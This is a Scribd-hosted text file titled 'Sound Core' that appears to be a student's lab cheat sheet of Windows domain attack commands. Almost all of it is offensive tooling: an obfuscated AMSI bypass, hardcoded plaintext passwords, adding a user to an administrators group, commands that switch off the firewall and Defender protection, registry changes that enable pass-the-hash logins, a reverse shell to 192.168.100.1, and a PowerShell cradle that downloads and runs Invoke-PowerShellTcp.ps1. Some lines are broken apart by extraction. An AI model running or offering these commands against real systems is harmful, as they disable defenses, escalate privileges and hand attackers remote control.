0% found this document useful (0 votes)
48 views

Sound Core

Uploaded by

t43253345
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
48 views

Sound Core

Uploaded by

t43253345
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 1

S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ([TYpE]( "{1}{0}"-

F'F','r
E' ) ) ; ( Get-varI`A`BLE (('1Q'+'2U') +'zX' ) -
VaL )."A`ss`Embly"."GET`TY`Pe"(("{6}
{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'t
o'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',
('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Pub
l'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

$SecPassword = ConvertTo-SecureString '6G1QSvFC75d48Z0tEx26c' -AsPlainText -Force


$Cred = New-Object System.Management.Automation.PSCredential('CITADEL\studentuser',
$SecPassword)
Add-DomainGroupMember -Identity 'COMPANYADMINISTRATORS' -Members'CITADEL\
studentuser' -Credential $cred
net localgroup administrators

netsh firewall set opmode disable


netsh advfirewall set allprofiles state off

powershell -c "Set-MpPreference -DisableRealtimeMonitoring 1; Set-MpPreference -


DisableIOAVProtection 1; Add-MpPreference -ExclusionPath 'C:\'"

powershell -c "New-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Lsa'-


Name DisableRestrictedAdmin -Value 0
REG ADD"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\
LocalAccountTokenFilterPolicy" /t REG_DWORD /d 1

sharemanager
Password: Us3dForControllingFilesAcrossCitadel!

cd \\srv71\ScheduledQueries

reverse Reverse -IPAdress 192.168.100.1 -Port 443

iex((new-object system.net.webclient).downloadstring('http://192.168.100.1/Invoke-
PowerShellTcp.ps1')

Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope Process


Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser

You might also like